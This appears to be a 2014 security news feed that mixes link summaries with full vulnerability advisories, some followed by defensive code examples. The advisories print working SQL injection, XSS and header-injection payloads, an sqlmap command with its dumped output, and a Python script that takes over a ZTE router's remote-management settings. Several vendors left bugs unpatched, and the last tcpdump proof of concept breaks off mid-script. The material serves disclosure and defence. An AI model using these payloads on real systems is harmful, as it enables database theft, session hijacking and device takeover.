November 16, 2014, 1:06 pm
Today a Tumblr post was brought to my attention: apparently there's malware doing the rounds that makes use of Steam chat, (adding Steam friends and) spamming Steam users.
more here..........http://bartblaze.blogspot.com/2014/11/malware-spreading-via-steam-chat.html
November 16, 2014, 9:49 pm
Today I'll be taking a look at Stuxnet, mostly at the kernel level (as usual) rather than its impact on user mode. I'll still, however, go over a few user-mode things as they tie in with our kernel-level discussion.
more here.......http://bsodanalysis.blogspot.com/2014/11/stuxnet-kernel-analysis.html
November 17, 2014, 2:35 am
Document Title:
============
Proticaret E-Commerce Script v3.0 >= SQL Injection

Release Date:
===========
13 Nov 2014

Product & Service Introduction:
========================
Proticaret is a free e-commerce script.

Abstract Advisory Information:
=======================
BGA Security Team discovered an SQL injection vulnerability in Proticaret E-Commerce Script v3.0

Vulnerability Disclosure Timeline:
=========================
20 Oct 2014 : Contact with Vendor
20 Nov 2014 : Vendor Response
June 26, 2014 : Patch Released
13 Nov 2014 : Public Disclosure

Discovery Status:
=============
Published

Affected Product(s):
===============
Promist Bilgi İletişim Teknolojileri A.Ş
Product: Proticaret E-commerce Script v3.0 >=

Exploitation Technique:
==================
Remote, Unauthenticated

Severity Level:
===========
Critical

Technical Details & Description:
========================
SQL Injection

Proof of Concept (PoC):
==================
Proof of Concept

Request:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
  <soapenv:Header/>
  <soapenv:Body>
    <tem:GetProductCodes>
      <!--Optional:-->
      <tem:Code>1' from Users where (select top 1 password from users where userId=101)>1- -</tem:Code>
      <!--Optional:-->
      <tem:StartWith>?</tem:StartWith>
    </tem:GetProductCodes>
  </soapenv:Body>
</soapenv:Envelope>

Response:
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <soap:Body>
    <soap:Fault>
      <faultcode>soap:Server</faultcode>
      <faultstring>System.Web.Services.Protocols.SoapException: Server was unable to process request. ---> System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value 'secretpassword' to data type int.
        at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
        at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
        at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)
        at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)
        at System.Data.SqlClient.SqlDataReader.TryHasMoreRows(Boolean& moreRows)
        at System.Data.SqlClient.SqlDataReader.TryReadInternal(Boolean setTimeout, Boolean& more)
        at System.Data.SqlClient.SqlDataReader.Read()
        at ASPNetPortal.ProductService.GetProductCodes(String Code, String StartWith)
        --- End of inner exception stack trace ---</faultstring>
      <detail/>
    </soap:Fault>
  </soap:Body>
</soap:Envelope>

Solution Fix & Patch:
================
Apply the patch for v3.0

Security Risk:
==========
The risk of the vulnerabilities above is estimated as critical.

Credits & Authors:
==============
Bilgi Güvenliği Akademisi

Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.

Domain: www.bga.com.tr
Social: twitter.com/bgasecurity
Contact: bilgi@bga.com.tr
Copyright © 2014 | BGA
November 17, 2014, 2:37 am
Verisure is a supplier of wireless home alarms and connected services for the home. A Verisure setup can be composed of multiple devices, sensors and/or detectors such as motion detectors with camera, magnetic contacts for doors or windows, smoke detectors, keypads, sirens, etc. Each component of the setup communicates wirelessly with the central gateway, called the “Vbox”, which is itself monitored by Verisure agents over the Internet and/or a 3G connection.
As a Verisure customer, I was curious to get a clear view of the design and security measures implemented by the manufacturer. I therefore decided to buy a test kit on eBay (120 Euros), open it, and start an exciting journey inside the boxes.
more here...........http://funoverip.net/2014/11/reverse-engineer-a-verisure-wireless-alarm-part-1-radio-communications/
November 17, 2014, 2:39 am
I wrote a blog post on the technique used by this plugin here a while back. Many WAF devices can be tricked into believing a request is from itself, and therefore trusted, if specific headers are present.
more here.........https://www.codewatch.org/blog/?p=408
November 17, 2014, 2:42 am
=============================================
MGC ALERT 2014-003
- Original release date: March 6, 2014
- Last revised: November 18, 2014
- Discovered by: Manuel Garcia Cardenas
- Severity: 7,1/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
Blind SQL Injection in XOOPS <= 2.5.6

II. BACKGROUND
-------------------------
XOOPS is an acronym of "eXtensible Object Oriented Portal System". Though started as a portal system, it later developed into a web application framework. It aims to serve as a web framework for use by small, medium and large sites, through the installation of modules.

III. DESCRIPTION
-------------------------
It is possible to inject SQL code in the variable "selgroups" on the page "admin.php". This bug was found using the portal with authentication. To exploit the vulnerability it is only necessary to use version 1.0 of the HTTP protocol to interact with the application.

IV. PROOF OF CONCEPT
-------------------------
The following URLs and parameters have been confirmed to all suffer from Blind SQL injection.

/xoops/htdocs/modules/system/admin.php?fct=users&selgroups=1

Exploiting with SQLMap:

python sqlmap.py -u "http://192.168.244.129/xoops/htdocs/modules/system/admin.php?fct=users&selgroups=1" --cookie="PHPSESSID=kjrjempn828cgrv6k8tjp4fs60;xoops_user=0" -p "selgroups" --technique=TB --dbs

[INFO] POST parameter 'selgroups' is 'MySQL > 5.0.11 AND time-based blind (comment)' injectable
[INFO] POST parameter 'selgroups' is 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable
[INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[INFO] fetching database names
[INFO] fetching number of databases
[INFO] resumed: 4
[INFO] resumed: information_schema
[INFO] resumed: mysql
[INFO] resumed: phpmyadmin
[INFO] resumed: xoops
available databases [4]:
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] xoops

V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server compromise can result from these attacks. Client systems can also be targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-------------------------
XOOPS <= 2.5.6

VII. SOLUTION
-------------------------
Update to version 2.5.7

VIII. REFERENCES
-------------------------
http://xoops.org/
http://xoops.org/modules/news/article.php?storyid=6658

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-------------------------
January 21, 2014 1: Initial release

XI. DISCLOSURE TIMELINE
-------------------------
March 5, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas
March 5, 2014 2: Sent to vendor
June 17, 2014 3: New version that includes patched code
http://xoops.org/modules/news/article.php?storyid=6658
November 18, 2014 4: Sent to lists

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester
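The Proticaret SOAP fault above and the XOOPS "selgroups" parameter in this advisory are the same bug class: a request value is concatenated into SQL text, and in the Proticaret case the raw database error is then echoed back to the client, which is what turned a conversion failure into a password disclosure. The following is an added example, not code from either vendor or advisory; it uses an in-memory sqlite3 database with constructed tables as a stand-in for the real back ends and places the vulnerable pattern beside the hardened one (bound parameters, generic error message).

```python
import sqlite3


def make_demo_db():
    """Constructed schema: a product table the endpoint is meant to query
    and a users table it is not, with a constructed secret value."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (code TEXT)")
    con.execute("CREATE TABLE users (userId INTEGER, password TEXT)")
    con.executemany("INSERT INTO products VALUES (?)", [("A100",), ("A200",)])
    con.execute("INSERT INTO users VALUES (101, 'secretpassword')")
    return con


def get_product_codes_unsafe(con, code):
    """Vulnerable pattern: caller input is spliced into the SQL text, and the
    raw database error is returned to the client, as the SOAP fault above did."""
    sql = "SELECT code FROM products WHERE code = '" + code + "'"
    try:
        return [row[0] for row in con.execute(sql)]
    except sqlite3.Error as exc:
        return "error: " + str(exc)


def get_product_codes_safe(con, code):
    """Hardened pattern: the value travels as a bound parameter, so quotes and
    comment markers are data rather than SQL, and the client only ever sees a
    generic error while the detail goes to the server log."""
    try:
        rows = con.execute("SELECT code FROM products WHERE code = ?", (code,))
        return [row[0] for row in rows]
    except sqlite3.Error as exc:
        print("db error (logged server-side):", exc)
        return "error: request could not be processed"


if __name__ == "__main__":
    db = make_demo_db()
    for value in ("A100", "' OR 1=1 --", "1'"):
        print(repr(value), "unsafe ->", get_product_codes_unsafe(db, value))
        print(repr(value), "safe   ->", get_product_codes_safe(db, value))
```

With a single stray quote the unsafe version hands back the driver's error text, which is the side channel error-based injection relies on; the safe version treats the same input as a product code that simply does not exist.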
November 17, 2014, 2:42 am
=============================================
MGC ALERT 2014-002
- Original release date: March 5, 2014
- Last revised: November 17, 2014
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,8/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
Reflected XSS in Nibbleblog <= v4.0.1

II. BACKGROUND
-------------------------
Nibbleblog is a powerful engine for creating blogs; all you need for it to work is PHP.

III. DESCRIPTION
-------------------------
A reflected XSS vulnerability has been detected in Nibbleblog that allows arbitrary HTML/script code to be executed in the context of the victim user's browser.

The code injection is done through the parameters "author_name" and "content" of the page index.php.

IV. PROOF OF CONCEPT
-------------------------
Malicious Request:
http://vulnerablesite.com/nibbleblog/index.php?controller=post&action=view&id_post=1&hash=10905d09405f5db41d3c6645fd23e72746f76106&author_name=<XSS injection>&author_email=&content=<XSS injection>

Example:
http://vulnerablesite.com/nibbleblog/index.php?controller=post&action=view&id_post=1&hash=10905d09405f5db41d3c6645fd23e72746f76106&author_name=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&author_email=&content=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

V. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a targeted user's browser; this can be leveraged to steal sensitive information such as user credentials, personal data, etc.

VI. SYSTEMS AFFECTED
-------------------------
Nibbleblog <= v4.0.1

VII. SOLUTION
-------------------------
Update to version 4.0.2

VIII. REFERENCES
-------------------------
http://www.nibbleblog.com/
http://blog.nibbleblog.com/post/nibbleblog-v4.0.2-coffee/

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-------------------------
March 5, 2014 1: Initial release
November 17, 2014 2: Last revision

XI. DISCLOSURE TIMELINE
-------------------------
March 5, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas
March 5, 2014 2: Sent to vendor
March 7, 2014 3: New version that includes patched code
http://blog.nibbleblog.com/post/nibbleblog-v4.0.2-coffee/
November 17, 2014 4: Sent to lists

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester
November 17, 2014, 3:58 am
Microsoft addressed CVE-2014-6321 this Patch Tuesday, which has been hyped as the next Heartbleed. This vulnerability (actually at least 2 vulnerabilities) promises remote code execution in applications that use the SChannel Security Service Provider, such as Microsoft Internet Information Services (IIS).
The details have been scarce. Let's fix that.
- See more at: http://blog.beyondtrust.com/triggering-ms14-066
November 17, 2014, 8:27 am
During the last Hackito Session, a group of passionate techies gathered and, over one evening, dug up whatever they could on BTsync. The goal of this Hackito Session was to analyze the security of BTsync.
more here........http://2014.hackitoergosum.org/bittorrentsync-security-privacy-analysis-hackito-session-results/
November 17, 2014, 8:30 am
LinuxChiro
==========
Posture checking and correcting for Linux
What it checks/fixes:
- Files/folders for permissions and/or ownership
- Config files for correct option/value settings (separator can be specified)
- Ex: "PermitEmptyPasswords no" in sshd_config or "net.ipv4.tcp_syncookies = 1" in /etc/sysctl.conf
- Service checks (Running and Startup Configs)
Core functionality:
- Examination - Audit things to be fixed, things already fixed or the status of all
- Prescription - Produces a list of the commands that should be run to resolve issues
- Adjustment - Fix issues interactively (locally) and non-interactively (locally/remotely)
- Insurance - Backs up things before making each change and creates a list of commands to run to easily undo changes
more here........https://github.com/johnculkin/LinuxChiro
November 17, 2014, 10:06 am
=============================================
MGC ALERT 2014-004
- Original release date: March 11, 2014
- Last revised: November 18, 2014
- Discovered by: Manuel Garcia Cardenas
- Severity: 10/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
Multiple Vulnerabilities in WebsiteBaker 2.8.3

II. BACKGROUND
-------------------------
WebsiteBaker helps you to create the website you want: a free, easy and secure, flexible and extensible open source content management system (CMS).

III. DESCRIPTION
-------------------------
It is possible to inject SQL code in the variable "id" on the page "modify.php". This bug was found using the portal without authentication. To exploit the vulnerability it is only necessary to use version 1.0 of the HTTP protocol to interact with the application.

A reflected XSS vulnerability has been detected in WebsiteBaker that allows arbitrary HTML/script code to be executed in the context of the victim user's browser.

An input validation problem exists within WebsiteBaker which allows injecting CR (carriage return - %0D or \r) and LF (line feed - %0A or \n) characters into the server HTTP response header, resulting in an HTTP Response Splitting vulnerability.

IV. PROOF OF CONCEPT
-------------------------
SQL Injection:
/wb/admin/pages/modify.php?page_id=1

Cross-Site Scripting GET:
/wb/admin/admintools/tool.php?tool=captcha_control&6d442"><script>alert(1)</script>8e3b12642a8=1
/wb/modules/edit_module_files.php?page_id=1&mod_dir=news&edit_file=frontend.css&action=edit&page_id=1&section_id=%007e393<script>alert(1)</script>9f8a40a7355f9acf0
/wb/modules/news/add_post.php?page_id=1&section_id=f953a"><script>alert(1)</script>4ddf3369c1f
/wb/modules/news/modify_group.php?page_id=1&section_id=%008cf03"><script>alert(1)</script>2680504c3ec&group_id=62be99873b33d1d3
/wb/modules/news/modify_post.php?page_id=1&section_id=%003874a<script>alert(1)</script>4194d511605&post_id=db89943875a2db52
/wb/modules/news/modify_settings.php?page_id=1&section_id=8b2f4"><script>alert(1)</script>bdc8b3919b5

HTTP RESPONSE SPLITTING:
If you enter a valid user and password, you can inject malicious code into the headers, for example:

POST /wb/admin/login/index.php HTTP/1.1
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.244.129:80/wb/
Host: 127.0.0.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

password_fieldname=password_nwh1uuwb&password_nwh1uuwb=VALIDPASS&remember=true&submit=Entrar&url=%0d%0a%20InjectedHeader:MaliciousCode&username_fieldname=username_nwh1uuwb&username_nwh1uuwb=admin

Response

You can inject a new header named InjectedHeader:MaliciousCode because we inject a CR&LF new line with %0d%0a%20.

V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server compromise can result from these attacks. Client systems can also be targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-------------------------
WebsiteBaker <= 2.8.3

VII. SOLUTION
-------------------------
No news releases

VIII. REFERENCES
-------------------------
http://www.websitebaker.org

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-------------------------
March 11, 2014 1: Initial release

XI. DISCLOSURE TIMELINE
-------------------------
March 11, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas
March 11, 2014 2: Sent to vendor
June 05, 2014 3: Second mail to the vendor without response
November 18, 2014 4: Sent to lists

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester
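The response-splitting issue in this advisory comes down to one decision: the post-login "url" parameter is URL-decoded and then written straight into a response header, so a %0d%0a in the parameter ends the header and starts another. The following is an added example, not WebsiteBaker's code, of how a login handler can validate that parameter before it reaches a Location header; the function and header names, the default landing page and the rule that only same-site relative paths are accepted are assumptions made for the example.

```python
import re
from urllib.parse import unquote, urlsplit


class HeaderInjectionError(ValueError):
    """Raised when a value destined for an HTTP header could split it."""


# CR and LF are the characters the advisory injects; NUL is rejected as well
# because some servers truncate the header there.
_CTRL = re.compile(r"[\r\n\x00]")


def safe_redirect_target(raw_url, default="/wb/admin/"):
    """Validate the user-supplied post-login 'url' parameter for use in a
    Location header. The application decodes the parameter before use, so the
    check runs on the decoded text, never on the percent-encoded form."""
    target = unquote(raw_url or "")
    if _CTRL.search(target):
        raise HeaderInjectionError("control character in redirect target")
    parts = urlsplit(target)
    # Same-site relative paths only: no scheme, no host, no protocol-relative
    # '//host' form, so the login form cannot double as an open redirect.
    if parts.scheme or parts.netloc or not target.startswith("/") or target.startswith("//"):
        return default
    return target


def build_login_response_headers(raw_url):
    """Headers a login handler would emit after a successful login; each tuple
    is one header, so a CRLF in a value can never create a second one."""
    return [
        ("Location", safe_redirect_target(raw_url)),
        ("Cache-Control", "no-store"),
    ]


if __name__ == "__main__":
    for value in ("/wb/admin/pages/", "%0d%0a%20InjectedHeader:MaliciousCode", "http://example.invalid/"):
        try:
            print(repr(value), "->", build_login_response_headers(value))
        except HeaderInjectionError as exc:
            print(repr(value), "-> rejected:", exc)
```

Rejecting the request outright (rather than silently stripping the CR/LF) is deliberate: a request carrying a raw newline in a redirect parameter is an attack probe, and an error you can log and alert on is worth more than a quietly sanitized redirect. Python's own http.client refuses header values containing CR or LF for the same reason, but that protects the client side only; the server-side check above is still needed.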
November 17, 2014, 10:08 am
It’s been two months since our disclosure of an Object Injection vulnerability affecting versions <2.3.3 of the Joomla! Hikashop extension. The vulnerability allowed an attacker to execute malicious code on a target website.
How Does Object Injection Work?
more here........http://blog.sucuri.net/2014/11/deep-dive-into-the-hikashop-vulnerability.html
November 17, 2014, 10:09 am
=============================================
MGC ALERT 2014-005
- Original release date: March 5, 2014
- Last revised: November 18, 2014
- Discovered by: Manuel Garcia Cardenas
- Severity: 10/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
Multiple Vulnerabilities in Zoph <= 0.9.1

II. BACKGROUND
-------------------------
Zoph (Zoph Organizes Photos) is a web based digital image presentation and management system. In other words, a photo album. It is built with PHP, MySQL and Perl.

III. DESCRIPTION
-------------------------
It is possible to inject SQL code in the variables "id" and "action" on the pages group, photos and user. This bug was found using the portal with authentication. To exploit the vulnerability it is only necessary to use version 1.0 of the HTTP protocol to interact with the application.

A reflected XSS vulnerability has been detected in Zoph that allows arbitrary HTML/script code to be executed in the context of the victim user's browser.

IV. PROOF OF CONCEPT
-------------------------
SQL Injection:
/zoph/php/group.php?_action=1'%22&_clear_crumbs=1
/zoph/php/photos.php?location_id=1'%22
/zoph/php/user.php?user_id=&_action=1'%22

Cross-Site Scripting GET:
/zoph/php/edit_photos.php?photographer_id=3"><script>alert(1)</script>
/zoph/php/edit_photos.php?album_id=2&_crumb=3"><script>alert(1)</script>

V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server compromise can result from these attacks. Client systems can also be targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-------------------------
Zoph <= 0.9.1

VII. SOLUTION
-------------------------
No news releases

VIII. REFERENCES
-------------------------
http://www.zoph.org/

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-------------------------
March 11, 2014 1: Initial release

XI. DISCLOSURE TIMELINE
-------------------------
March 5, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas
March 5, 2014 2: Sent to vendor
June 17, 2014 3: Second mail to the vendor without response
November 18, 2014 4: Sent to lists

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester
November 17, 2014, 10:00 pm
About the software
==================
ZTE ZXHN H108L is provided by some large Greek ISPs to their subscribers.

Vulnerability Details
=====================
CWMP configuration is accessible only through the Administrator account. CWMP is a protocol widely used by ISPs worldwide for remote provisioning and troubleshooting of their subscribers' equipment. However, editing the CWMP configuration (more specifically, sending the POST request) does not require any user authentication.

Affected Products
=================
Device model : ZTE ZXHN H108L
Firmware Version : ZXHN H108LV4.0.0d_ZRQ_GR4

Proof of Concept
================
#!/usr/bin/python
import requests

acs_server = "http://<server>:<port>"
acs_user = "user"
acs_pass = "pass"

# Connection request parameters. When a request is made to the following URL, using the specified user/pass combination,
# router will connect back to the ACS server.
conn_url = "/tr069"
conn_port = "7564"
conn_user = "user"
conn_pass = "pass"

# Periodic inform parameters
active = 1
interval = 2000

payload = {'CWMP_active': '1', 'CWMP_ACSURL': acs_server, 'CWMP_ACSUserName': acs_user, 'CWMP_ACSPassword': acs_pass, 'CWMP_ConnectionRequestPath': conn_url, 'CWMP_ConnectionRequestPort': conn_port, 'CWMP_ConnectionRequestUserName': conn_user, 'CWMP_ConnectionRequestPassword': conn_pass, 'CWMP_PeriodActive': active, 'CWMP_PeriodInterval': interval, 'CWMPLockFlag': '0'}

r = requests.post("http://192.168.1.254/Forms/access_cwmp_1", data=payload)

Impact
======
The described vulnerability allows any unauthenticated user to edit the CWMP configuration. Exploitation can be performed by LAN users or through the Internet if the router is configured to expose the web interface to the WAN. Also, because the router lacks CSRF protection, malicious JS code can be deployed in order to exploit the vulnerability through a malicious web page.

Severity
========
Medium

References
==========
https://projectzero.gr/en/2014/11/zte-zxhn-h108l-authentication-bypass/

Disclosure Timeline
===================
27/10/2014 - First communication attempt to both vendor and ISP
04/11/2014 - ZTE response states that ISP should be contacted
03/11/2014 - Second attempt to contact the ISP.
14/11/2014 - No response from ISP. Public Disclosure

Contact Information
===================
Domain: https://projectzero.gr
Social: twitter.com/projectzerolabs
Contact: labs _at_ projectzero.gr
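The advisory describes two separate defects: the Administrator login guards the page that shows the CWMP form but not the POST that writes it, and nothing ties that POST to the logged-in browser, so a malicious page can submit it on the victim's behalf. The following is an added example, not ZTE firmware code, that models both the flawed and the corrected handler for the /Forms/access_cwmp_1 endpoint as plain Python functions; the session store, the csrf_token field name and the returned status codes are assumptions made for the example.

```python
import hmac
import secrets

# Constructed in-memory session store: session id -> {"user", "csrf"}.
SESSIONS = {}
# Settings a handler accepted, recorded here instead of touching a device.
APPLIED = []


def login(user):
    """Create a session for `user`; returns (session id, per-session CSRF token)."""
    sid, csrf = secrets.token_hex(16), secrets.token_hex(16)
    SESSIONS[sid] = {"user": user, "csrf": csrf}
    return sid, csrf


def apply_cwmp_settings(form):
    APPLIED.append({k: v for k, v in form.items() if k.startswith("CWMP")})


def handle_cwmp_form_vulnerable(method, cookies, form):
    """Model of the flaw: only the GET that renders the page checks for the
    Administrator session; the POST that changes the ACS settings does not.
    Returns an HTTP status code."""
    if method == "GET":
        session = SESSIONS.get(cookies.get("sid", ""))
        return 200 if session and session["user"] == "admin" else 401
    apply_cwmp_settings(form)
    return 200


def handle_cwmp_form(method, cookies, form):
    """Corrected handler: every method requires the Administrator session, and
    a state-changing POST must also carry the CSRF token bound to that session.
    A script on a third-party page can make the victim's browser send the
    cookie, but it cannot read the token, so the forged POST fails with 403."""
    session = SESSIONS.get(cookies.get("sid", ""))
    if session is None or session["user"] != "admin":
        return 401
    if method == "POST":
        # Constant-time comparison so the token cannot be guessed byte by byte.
        if not hmac.compare_digest(form.get("csrf_token", ""), session["csrf"]):
            return 403
        apply_cwmp_settings(form)
    return 200


if __name__ == "__main__":
    form = {"CWMP_active": "1", "CWMP_ACSURL": "http://acs.example.invalid"}
    print("vulnerable, no session:", handle_cwmp_form_vulnerable("POST", {}, form))
    print("fixed, no session:     ", handle_cwmp_form("POST", {}, form))
    sid, csrf = login("admin")
    print("fixed, session only:   ", handle_cwmp_form("POST", {"sid": sid}, form))
    print("fixed, session + token:", handle_cwmp_form("POST", {"sid": sid}, dict(form, csrf_token=csrf)))
```

The same two checks, applied to every state-changing request rather than to the page that renders the form, are what a device like this needs; the CSRF token matters even once authentication is enforced, because the LAN-side web interface is reachable from any page the administrator's browser happens to load.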
November 18, 2014, 5:49 am
Last August, at Defcon, the hacker conference in Las Vegas, a boyish 40-year-old engineer and security researcher named Michael Ossmann stood on the stage of a lecture hall, about to detail a stunning new set of tools designed for spying on a wealth of electronic devices.
more here........http://motherboard.vice.com/read/michael-ossmann-and-the-nsa-playset
November 18, 2014, 5:51 am
Probably the oldest complaint about TLS is that its handshake is slow and that, together with the transport encryption, it carries a lot of CPU overhead. This is certainly no longer true if TLS is configured correctly (even if some companies choose to ignore that).
One of the most important features for improving the user experience of visitors accessing your site via TLS is session resumption.
more here......https://timtaubert.de/blog/2014/11/the-sad-state-of-server-side-tls-session-resumption-implementations/
November 18, 2014, 1:14 pm
Last week Microsoft released EMET 5.1 to address some compatibility issues and strengthen mitigations to make them more resilient to attacks and bypasses. We, of course, were curious to see if our EMET 5.0 disarming technique has been addressed by the latest version of the toolkit.
more here.........http://www.offensive-security.com/vulndev/disarming-and-bypassing-emet-5-1/
November 18, 2014, 1:15 pm
Recursion is the process of repeating items in a self-similar way, and that’s what the XML Entity Expansion (XEE)[1] is about: a small string is referenced a huge number of times.
Technology standards sometimes include features that affect the security of applications. Amit Klein found in 2002 that XML entities could be used to make parsers consume an unlimited amount of resources and then crash, which is called a billion laughs attack.
more here........http://blog.ioactive.com/2014/11/die-laughing-from-billion-laughs.html
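The amplification described above is visible in the DTD before any of it is expanded: each entity's replacement text references the previous one a fixed number of times, so the expanded size can be computed from the declarations alone. The following is an added example, not code from the IOActive post, that does exactly that with the standard library's expat bindings: it records every internal entity as it is declared, works out the fully expanded length, and refuses the document as soon as any entity would exceed a limit, before the parser ever reaches the body that triggers the expansion. The limit value, the helper names and the constructed "lol" document are assumptions made for the example.

```python
import re
import xml.parsers.expat

# Constructed limit: the largest fully expanded size any one entity may reach.
MAX_ENTITY_EXPANSION = 100_000
_REF = re.compile(r"&([^&;\s]+);")


class EntityExpansionError(ValueError):
    """Document refused because an entity would expand beyond the limit."""


def expansion_sizes(entities):
    """Fully expanded length of every internal entity in `entities`
    (name -> replacement text), following references between entities.
    References to undeclared entities are counted as literal text."""
    sizes = {}

    def size_of(name, active):
        if name in sizes:
            return sizes[name]
        if name in active:  # XML forbids recursive entities; reject early
            raise EntityExpansionError("recursive entity " + name)
        value, total, pos = entities[name], 0, 0
        for m in _REF.finditer(value):
            total += m.start() - pos
            ref = m.group(1)
            total += size_of(ref, active | {name}) if ref in entities else len(m.group(0))
            pos = m.end()
        sizes[name] = total + len(value) - pos
        return sizes[name]

    for name in entities:
        size_of(name, frozenset())
    return sizes


def parse_guarded(data):
    """Parse `data` with expat and return its text content, refusing the
    document as soon as a declared entity would expand past the limit."""
    entities, text = {}, []
    parser = xml.parsers.expat.ParserCreate()

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if is_param or value is None:  # parameter or external entity: not expanded here
            return
        entities[name] = value
        worst = max(expansion_sizes(entities).values())
        if worst > MAX_ENTITY_EXPANSION:
            raise EntityExpansionError(f"entity expansion of {worst} bytes refused")

    parser.EntityDeclHandler = on_entity_decl
    parser.CharacterDataHandler = text.append
    parser.Parse(data, True)  # a handler exception propagates out of Parse
    return "".join(text)


def is_refused(data):
    """True when parse_guarded rejects `data` for excessive expansion."""
    try:
        parse_guarded(data)
    except EntityExpansionError:
        return True
    return False


def lol_document(levels, fanout=10):
    """Constructed billion-laughs style document: each level references the
    previous one `fanout` times, so &lolN; expands to 3 * fanout**N bytes."""
    decls = ['<!ENTITY lol0 "lol">']
    for n in range(1, levels + 1):
        refs = "&lol%d;" % (n - 1) * fanout
        decls.append(f'<!ENTITY lol{n} "{refs}">')
    return f'<!DOCTYPE x [{"".join(decls)}]><x>&lol{levels};</x>'


if __name__ == "__main__":
    print("2 levels ->", len(parse_guarded(lol_document(2))), "bytes of text")
    print("6 levels refused:", is_refused(lol_document(6)))
```

The check runs while the DTD is still being read, so the cost of refusing a hostile document is a few dictionary lookups rather than the memory the expansion would have consumed; recent libexpat releases carry their own amplification limits, but an explicit bound at the application layer keeps the policy visible and testable.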
November 18, 2014, 1:16 pm
Recently, we came across a malware sample that has been traversing the Internet disguised as an image of a woman. The malware sample uses several layers of obfuscation to hide its payload, including the use of steganography.
more here.........http://blogs.cisco.com/security/talos/reversing-multilayer-net-malware
November 18, 2014, 4:51 pm
CVE-2014-8768 tcpdump denial of service in verbose mode using malformed Geonet payload

1. Background
tcpdump is a powerful command-line packet analyzer. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.

2. Summary Information
It was found that malformed network traffic (Geonet-based) can lead to an application crash (denial of service) if the verbose output of tcpdump monitoring the network is used.

3. Technical Description
The application decoder for the geonet protocol fails to perform external input validation and performs insufficient checking on length computations, leading to an unsafe decrement and underflow in the function

geonet_print(netdissect_options *ndo, const u_char *eth, const u_char *bp, u_int length)

The affected variable is length, which is later used to print a memory chunk, which eventually leads to a segfault. The function contains several unsafe computations updating the length variable.

To reproduce, start tcpdump on a network interface

sudo tcpdump -i lo -s 0 -n -v

(running the program with sudo might hide the segfault message on certain environments, see dmesg for details)

and use the following python program to generate a frame on the network (might also need sudo):

#!/usr/bin/env python
from socket import socket, AF_PACKET, SOCK_RAW
s = socket(AF_PACKET, SOCK_RAW)
s.bind(("lo", 0))
